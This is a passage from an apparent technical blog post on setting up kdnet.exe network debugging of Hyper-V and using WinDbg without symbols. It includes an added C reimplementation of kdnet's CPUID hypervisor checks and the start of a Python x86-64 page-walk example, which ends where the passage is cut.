Network debugging is simpler to configure and faster than COM-port debugging, so I recommend it.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">kdnet.exe, included in Debugging Tools for Windows 10, can be used to configure the root partition for debugging:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.35pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kdnet.exe 192.168.2.1 50002</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You will see the message “Microsoft hypervisor supports using KDNET in guest VMs”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b 
style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 87px; overflow: hidden; width: 595px;"><img height="87" src="https://lh4.googleusercontent.com/Et7jqqdYrC7IXe-N9gCmOFAF3hQtVjUzL2qK13w2Ow5TmlIWYrvwAwSrukKt5yIuAjLjlGQwKN3nCYKEeEsfpiUZs6zlVcx_frOPYShmdIlrgk7oobtjqSeXc8AkX5quLebBsWqNUs2jMjOqZQ" style="margin-left: 0px; margin-top: 0px;" width="595" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To check for this feature, kdnet.exe performs the following steps:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detects the presence of a hypervisor: cpuid(1), ecx[31] must be 1.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the hypervisor vendor ID signature: cpuid(0x40000000) must return “Microsoft Hv” in the ebx, ecx, edx registers.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the hypervisor interface signature: cpuid(0x40000001), eax must contain Hv#1 (HviIsHypervisorMicrosoftCompatible) or Xbnv (HviIsAnyHypervisorPresent).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Checks the build number: cpuid(0x40000002), eax must be 0x23F0 (9200, the Windows 8 / Windows Server 2012 build) or higher. If it is lower, the following message appears:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Microsoft hypervisor running this VM does not support KDNET. Please upgrade to the hypervisor shipped in Windows 8, Windows Server 2012 or later.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Executes cpuid(0x40000003) and checks that ebx[12] is 1 (the partition was created with the CpuManagement flag).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, executes cpuid(0x40000004) (implementation recommendations) and checks the nested virtualization bit (bit 12); if it is set, returns true.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If all checks pass, kdnet prints the message that KDNET is supported.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When you configure a guest virtual machine, kdnet.exe prints additional messages:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Kdnet.exe 10.0.0.1 50020</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enabling network debugging on Intel(R) 82574L Gigabit Network Connection.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Manage-bde.exe not present. Bitlocker presumed disabled.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To debug this machine, run the following command on your debugger host machine.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">windbg -k net:port=50020,key=3p62jxxhmzlc1.3ygror9z6lgy.oq0wi18racbo.1fe0y66p7uzqe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 
1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then reboot this machine by running shutdown -r -t 0 from this command prompt.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KDNET.exe reads the VM GUID from the HKLM\Software\Microsoft\Virtual Machine\Guest\Parameters\VirtualMachineId key and the debugging key from HKLM\BCD00000000\Objects\{4636856e-540f-4170-a130-a84776f4c654}\Elements\1200001d\Element.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 434px;"><img height="110" src="https://lh4.googleusercontent.com/tGcEXR6opSVsb7vry3YGRi2bkz8Z07cXMTmHGHwL7Jlev2OdgnoGelIQtQa_wnVxdyyvvvQXp6oYoR08EuFeygY-gwWxxfpm67AdECA1T_ag6pq2rUefMZZrAEy4kykYU5JtVuwldKNoUrFG6A" style="margin-left: 0px; margin-top: 0px;" width="434" /></span></span></p><p dir="ltr" 
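style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The six kdnet.exe checks listed above, as an added C example that is not kdnet.exe's own code: the checks run over a snapshot of CPUID leaves, so the same function can be exercised on constructed register values and on the live CPU. The names (kdnet_check_hypervisor, make_hyperv_guest_snapshot, the KDNET_* status values) are this example's own. Two assumptions are made: step 6 is read as reporting the nested-virtualization bit rather than failing on it, and the live read uses the &lt;cpuid.h&gt; header of GCC/Clang on x86.</span></p>

```c
/* Added example, not kdnet.exe's code: the six CPUID checks from the list above,
 * as a pure function over a snapshot of CPUID leaves so it runs on constructed
 * values as well as on the live CPU. Assumption: step 6 only reports the nested
 * bit and does not fail the check; live reads need GCC/Clang on x86 (<cpuid.h>). */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__GNUC__) && (defined(__x86_64__) || defined(__i386__))
#include <cpuid.h>
#define HAVE_CPUID 1
#endif
typedef struct { uint32_t eax, ebx, ecx, edx; } cpuid_regs_t;

/* The leaves kdnet.exe consults, captured in one snapshot. */
typedef struct {
    cpuid_regs_t leaf1;      /* CPUID(1): ecx[31] = a hypervisor is present         */
    cpuid_regs_t vendor;     /* CPUID(0x40000000): ebx,ecx,edx = 12-byte vendor ID  */
    cpuid_regs_t iface;      /* CPUID(0x40000001): eax = interface signature        */
    cpuid_regs_t version;    /* CPUID(0x40000002): eax = hypervisor build number    */
    cpuid_regs_t features;   /* CPUID(0x40000003): ebx = partition privilege flags  */
    cpuid_regs_t recommend;  /* CPUID(0x40000004): eax = implementation recommends. */
} hv_cpuid_t;

/* Non-zero values are the number of the step (1..5) at which the check failed. */
enum kdnet_hv_status {
    KDNET_HV_SUPPORTED = 0,
    KDNET_NO_HYPERVISOR,      /* 1: cpuid(1).ecx[31] clear               */
    KDNET_NOT_MICROSOFT_HV,   /* 2: vendor ID is not "Microsoft Hv"      */
    KDNET_UNKNOWN_INTERFACE,  /* 3: interface is neither Hv#1 nor Xbnv   */
    KDNET_HV_TOO_OLD,         /* 4: build number below 0x23F0 (9200)     */
    KDNET_NO_CPU_MANAGEMENT   /* 5: CpuManagement flag (ebx[12]) missing */
};

#define HV_MIN_BUILD            0x23F0u     /* 9200 = Windows 8 / Server 2012 */
#define HV_PRIV_CPU_MANAGEMENT  (1u << 12)  /* CPUID(0x40000003).ebx bit 12   */
#define HV_REC_NESTED           (1u << 12)  /* CPUID(0x40000004).eax bit 12, per the list */

/* Pack four ASCII bytes the way CPUID returns signatures: first byte lowest. */
static uint32_t pack4(const char *s) {
    return (uint32_t)(uint8_t)s[0] | ((uint32_t)(uint8_t)s[1] << 8) |
           ((uint32_t)(uint8_t)s[2] << 16) | ((uint32_t)(uint8_t)s[3] << 24);
}

/* Unpack the vendor ID from ebx, ecx, edx into a NUL-terminated 12-char string. */
static void hv_vendor_string(const cpuid_regs_t *r, char out[13]) {
    const uint32_t regs[3] = { r->ebx, r->ecx, r->edx };
    for (int i = 0; i < 12; i++)
        out[i] = (char)((regs[i / 4] >> (8 * (i % 4))) & 0xFFu);
    out[12] = '\0';
}

/* Steps 1..6; *nested receives the step-6 result once steps 1..5 have passed. */
enum kdnet_hv_status kdnet_check_hypervisor(const hv_cpuid_t *c, bool *nested) {
    char vendor[13];
    if (nested) *nested = false;
    if (!(c->leaf1.ecx & (1u << 31)))                return KDNET_NO_HYPERVISOR;
    hv_vendor_string(&c->vendor, vendor);
    if (strcmp(vendor, "Microsoft Hv") != 0)          return KDNET_NOT_MICROSOFT_HV;
    if (c->iface.eax != pack4("Hv#1") && c->iface.eax != pack4("Xbnv"))
                                                      return KDNET_UNKNOWN_INTERFACE;
    if (c->version.eax < HV_MIN_BUILD)                return KDNET_HV_TOO_OLD;
    if (!(c->features.ebx & HV_PRIV_CPU_MANAGEMENT))  return KDNET_NO_CPU_MANAGEMENT;
    if (nested) *nested = (c->recommend.eax & HV_REC_NESTED) != 0;
    return KDNET_HV_SUPPORTED;
}

/* Constructed snapshot of a Hyper-V guest (not captured from a real VM). */
hv_cpuid_t make_hyperv_guest_snapshot(uint32_t build, bool cpu_management, bool nested) {
    hv_cpuid_t c;
    memset(&c, 0, sizeof c);
    c.leaf1.ecx = 1u << 31;
    c.vendor.ebx = pack4("Micr"); c.vendor.ecx = pack4("osof"); c.vendor.edx = pack4("t Hv");
    c.iface.eax = pack4("Hv#1"); c.version.eax = build;
    c.features.ebx = cpu_management ? HV_PRIV_CPU_MANAGEMENT : 0;
    c.recommend.eax = nested ? HV_REC_NESTED : 0;
    return c;
}

/* Read the live leaves; returns false when not built with GCC/Clang for x86. */
bool read_hv_cpuid(hv_cpuid_t *c) {
#ifdef HAVE_CPUID
    cpuid_regs_t *out[6] = { &c->leaf1, &c->vendor, &c->iface,
                             &c->version, &c->features, &c->recommend };
    const uint32_t leaf[6] = { 1, 0x40000000, 0x40000001, 0x40000002, 0x40000003, 0x40000004 };
    for (int i = 0; i < 6; i++)
        __cpuid(leaf[i], out[i]->eax, out[i]->ebx, out[i]->ecx, out[i]->edx);
    return true;
#else
    (void)c; return false;
#endif
}

int main(void) {
    hv_cpuid_t live; bool nested = false;
    if (!read_hv_cpuid(&live)) return 2;  /* not an x86 GCC/Clang build */
    enum kdnet_hv_status st = kdnet_check_hypervisor(&live, &nested);
    if (st == KDNET_HV_SUPPORTED)
        printf("Microsoft hypervisor supports using KDNET in guest VMs (build %u, nested=%d)\n",
               (unsigned)live.version.eax, (int)nested);
    else printf("KDNET hypervisor check failed at step %d\n", (int)st);
    return st == KDNET_HV_SUPPORTED ? 0 : 1;
}
```

<p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Built with gcc or clang and run inside a Hyper-V VM, it prints the same “supports using KDNET” wording as kdnet.exe; on bare metal or under another hypervisor it prints the number of the first failing step, which is the first thing to compare when kdnet.exe refuses to configure a VM.</span></p><p dir="ltr" 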
style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Which WinDBG commands can be executed inside a Hyper-V debugging session? The Hyper-V kernel module has no public symbols, so the hvexts.dll extension cannot be used. Some standard WinDBG commands still work without symbols, however. If some of them fail, simply reload the extensions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load kext</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load kdexts</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load 
exts</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load ext</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">lm</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – view modules</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 
vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">k*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - view stack</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d*, e*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - read\write data from virtual addresses</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; 
margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!d*, !e*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - read\write display data from physical addresses</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r</span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – display registers</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!vtop</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – translate virtual to physical addresses. First, get cr3 and paste it as first parameter. 
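</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the original article and not WinDbg's own implementation), the following Python reproduces what !vtop does: a four-level x86-64 page walk from cr3 through PML4E, PDPE and PDE. The table entries in SAMPLE_PHYS_MEM are constructed to match the session shown below (cr3 0x10839d000, virtual address 0xfffffbb3aa6c3e66, which ends on a 2 MiB large page); the entry flag bits and the names vtop, format_walk and read_entry are the example's own assumptions.</span></p>

```python
# Added example (not code from the original article): a four-level x86-64 page
# walk that reproduces what WinDbg's "!vtop <cr3> <va>" prints. SAMPLE_PHYS_MEM
# is constructed to match the session in the article (cr3 0x10839d000,
# VA 0xfffffbb3aa6c3e66); the entry flag bits are assumed, not dumped.

PRESENT = 1 << 0
PS_BIT = 1 << 7                      # page-size bit: PDPE -> 1 GiB page, PDE -> 2 MiB page
FRAME_MASK = 0x000F_FFFF_FFFF_F000   # bits 12..51 of an entry hold the physical frame

# Constructed "physical memory": only the three qwords the walk touches exist.
# 0x63 = P|RW|A|D; 0xE3 additionally sets PS (large page).
SAMPLE_PHYS_MEM = {
    0x10839DFB8: 0x10A603000 | 0x63,  # PML4E -> PDPT at 0x10a603000
    0x10A603670: 0x10A604000 | 0x63,  # PDPE  -> PD   at 0x10a604000
    0x10A604A98: 0x100000000 | 0xE3,  # PDE, PS set -> 2 MiB page at 0x100000000
}

# (level name, shift of its 9-bit index field, large-page size at that level or None)
LEVELS = (
    ("PML4E", 39, None),
    ("PDPE", 30, 1 << 30),
    ("PDE", 21, 1 << 21),
    ("PTE", 12, None),
)


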